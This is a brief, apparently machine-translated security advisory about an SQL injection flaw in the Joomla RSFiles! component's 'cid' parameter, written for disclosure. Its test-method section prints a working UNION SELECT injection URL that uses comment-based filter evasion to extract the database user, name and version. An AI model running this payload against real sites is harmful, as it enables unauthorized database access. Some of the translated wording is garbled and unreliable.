Released on: 2013-03-18
Updated on: 2013-03-19
Affected Systems:
Joomla! RSFiles!
Description:
--------------------------------------------------------------------------------
Bugtraq id: 58547
Joomla! RSFiles! Yes Joomla! 1.5/2.5 download filter.
Joomla! RSFiles! The component does not properly filter the 'cid' parameter. The SQL injection vulnerability exists in the implementation. After successful exploitation, attackers can perform unauthorized database operations.
<* Source: ByEge
Link: http://www.exploit-db.com/exploits/24851/
*>
Test method:
--------------------------------------------------------------------------------
Alert
The following procedures (methods) may be offensive and are intended only for security research and teaching. Users are at your own risk!
Http://www.example.com /?
Option = com_rsfiles & amp; view = files & amp; layout = agreement & amp; tmpl = component & amp; cid = 1/**/aNd /**/
1 = 0/**/uNioN ++ sElecT + 1, CONCAT_WS (CHAR (32, 58, 32), user (), database (), version ())--
Suggestion:
--------------------------------------------------------------------------------
Vendor patch:
Joomla!
-------
Currently, the vendor does not provide patches or upgrade programs. We recommend that users who use the software follow the vendor's homepage to obtain the latest version:
Http://extensions.joomla.org/extensions/directory-a-documentation/downloads/10953